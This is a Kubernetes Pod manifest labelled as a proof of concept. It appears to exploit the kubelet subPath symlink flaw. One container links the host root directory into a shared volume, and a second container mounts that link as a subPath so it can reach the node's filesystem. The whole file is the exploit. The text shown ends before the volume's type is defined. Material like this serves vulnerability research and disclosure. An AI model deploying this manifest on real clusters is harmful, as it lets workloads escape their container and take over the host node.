apiVersion: v1
kind: Pod
metadata:
  name: poc
spec:
  containers:
  - image: alpine:latest
    name: subpath-container
    volumeMounts:
    - mountPath: /vol
      name: host-volume
    command: ["/bin/sh"]
    # create a symbolic link between / and a subpath of our volumeMount
    args: ["-c", "ln -s / /vol/host && sleep 1000"]
  - image: alpine:latest
    name: sploit-container
    volumeMounts:
    - mountPath: /vol
      name: host-volume
      # mount the subpath in our second container
      # and the kubelet follows the symlink on the node host
      subPath: host
    command: ["sleep"]
    args: ["1000"]
  volumes:
    - name: host-volume
    